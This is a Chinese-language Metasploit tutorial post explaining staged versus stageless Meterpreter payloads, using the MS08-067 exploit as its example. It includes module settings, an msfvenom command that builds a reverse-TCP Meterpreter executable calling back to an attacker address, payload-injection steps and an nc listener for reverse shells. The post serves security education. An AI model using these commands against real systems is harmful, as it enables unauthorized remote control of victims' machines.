你們是否發(fā)現(xiàn)msf的payload中,經(jīng)常會看見一對對長得特別像的兄弟?
我第一次學(xué)習(xí)metasploit的時候,可能和大家的開場方式一樣,試用08067的漏洞來攻擊一臺windows xp獲取一個meterpreter shell。那個時候幾乎沒怎么變過的使用reverse_tcp連接,但是有一天…
payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
我發(fā)現(xiàn)了一對雙胞胎,他們長得幾乎一模一樣,但是我從來沒有見過別人使用他的另一個小兄弟,所以這篇文章,我就想和大家聊聊metasploit payload模式背后的秘密。
我們就以這個常用的meterpreter reverse_tcp來舉例,其實這兩個payload的區(qū)別從官方介紹上的話,我們可以發(fā)現(xiàn)兩個比較重要的詞語來闡述他們的不同inline和stager,其實,用metasploit官方的說法來說,他們第一個payload屬于stage模式,第二個payload屬于stageless模式,那他們之間具體有什么區(qū)別呢?
我們還是使用經(jīng)典的08067來介紹,下面是我們的模塊配置信息:
Stage
msf5 exploit(windows/smb/ms08_067_netapi) > show options
Module options (exploit/windows/smb/ms08_067_netapi):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.1.2 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 0.0.0.0 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Targeting
當(dāng)我們使用metasplit的ms08_067_netapi模塊之后,使用payload/windows/meterpreter/reverse_tcp模塊,并開啟一個multi/handler連接監(jiān)聽著我們本機的4444端口,有了解過緩沖區(qū)溢出的同學(xué)可能都知道,攻擊者會利用軟件的某個缺陷來傳輸一段很長的shellcode來溢出目標(biāo)的緩沖區(qū),從而控制EIP指針來跳轉(zhuǎn)到我們的shellcode上,執(zhí)行我們的代碼,但是這段shellcode并不能過長,shellcode過長,可能會導(dǎo)致覆蓋到了上一函數(shù)棧幀的數(shù)據(jù),導(dǎo)致異常的發(fā)生。所以像我們攻擊者最希望就是生成一段短小精悍的shellcode啦。
像這張圖,我們攻擊機像目標(biāo)靶機發(fā)送了一段shellcode,并覆蓋了EIP,導(dǎo)致程序執(zhí)行的時候跳回shellcode的開頭,從而控制程序的執(zhí)行情況,執(zhí)行我們的惡意代碼,這段惡意代碼就只要干兩件事,第一件事就是向內(nèi)存申請開辟一塊空間,第二件事就是回連我們的4444端口,這段shellcode為我們干的事情就好像是一個前排沖鋒的戰(zhàn)士,打開城墻的大門好讓更多的精兵沖進來。我們稱這段shellcode為stage0,也就是第一階段
這時,我們的攻擊機,已經(jīng)開始監(jiān)聽4444端口了,只要連接一成功,就會把meterpreter shell最核心的dll文件發(fā)送到靶機上
我們之前說過,當(dāng)靶機運行了我們的shellcode,會在內(nèi)存里面開辟一塊土地,這個地方就是為我們的metsrv留的,metsrv.dll這個文件是meterpreter的核心主件,有了他,我們才能獲取到一個meterpreter shell,當(dāng)metsrv傳輸成功之后,shellcode就會把控制權(quán)轉(zhuǎn)給metsrv,metsrv這時再去請求另外兩個dll文件stdapi和priv。這個時候我們一般就會看到一個讓人振奮的提示:
msf5 exploit(windows/smb/ms08_067_netapi) > run
[*] Sending stage (206403 bytes) to 10.73.151.75
[*] Starting interaction with 1...
meterpreter >
Stageless
現(xiàn)在我們知道了meterpreter/reverse_tcp是分階段的shellcode,并且他分階段的原因是因為在溢出攻擊的時候shellcode應(yīng)該盡可能保持得更短,這個時候理解他小兄弟meterpreter_reverse_tcp就方便的多,和meterpreter/reverse_tcp不同的是,他的小兄弟meterpreter_reverse_tcp是一個不分階段的payload,我們稱之為stageless(unstage),他在生成的時候就已經(jīng)將我們獲取一個meterpreter必須要用的stdapi已經(jīng)包含在其中了。那這又有什么好處呢?試想一下,如果我們通過層層的代理,在內(nèi)網(wǎng)進行漫游,這個時候使用分階段的payload如果網(wǎng)絡(luò)傳輸出現(xiàn)了問題,metsrv.dll沒有加載過去,可能就會錯失一個shell,stageless的payload會讓人放心不少默認(rèn)的stageless payload只會包含stageless,所以如果想將stdapi和priv兩個組建給包含進去的華我們可以用extensions命令:
msfvenom -p windows/meterpreter_reverse_tcp LHOST=172.16.52.1 LPORT=4444 EXTENSIONS=stdapi,priv -f exe -o stageless.exe
Another Thing
分階段的payload,我們必須使用exploit/multi/handler這個模塊使用,但是當(dāng)我們想回彈一個基礎(chǔ)的shell的時候,其實可以使用nc來監(jiān)聽端口直接回連到nc上,為了測試方便,我直接在已獲得session的機器中,注入新的payload來測試:
Target:
use exploit/windows/local/payload_inject
set payload windows/shell_reverse_tcp
set sessions 1
set DisablePayloadHandler True (這個設(shè)置是讓msf不監(jiān)聽端口)
run
root:~# nc -nvpl 4444
當(dāng)有時獲取到了root權(quán)限,想反彈linux shell的時候,這時meterprter的需求就不是那么高了,我們就可以使用shell_reverse_tcp(或者是bind)來生成一個stageless的bash腳本,直接使用nc來接受shell
視頻演示:
課后作業(yè):
1.在生成一個windows/shell_reverse_tcp的時候,是否需要指定EXTENSIONS=stdapi,priv?
2.meterpreter_reverse_tcp是否可以不用exploit/multi/hander模塊,直接用nc來監(jiān)聽獲取?
3.在你只有一個windows的反彈shell的時候,反悔想使用meterpreter的shell了,有什么辦法來獲取呢?
大家在留言處踴躍留言吧,記得加上自己的思考過程,have fun ^_^
REFERER:
https://xz.aliyun.com/t/1709
https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Stageless-Mode
| 
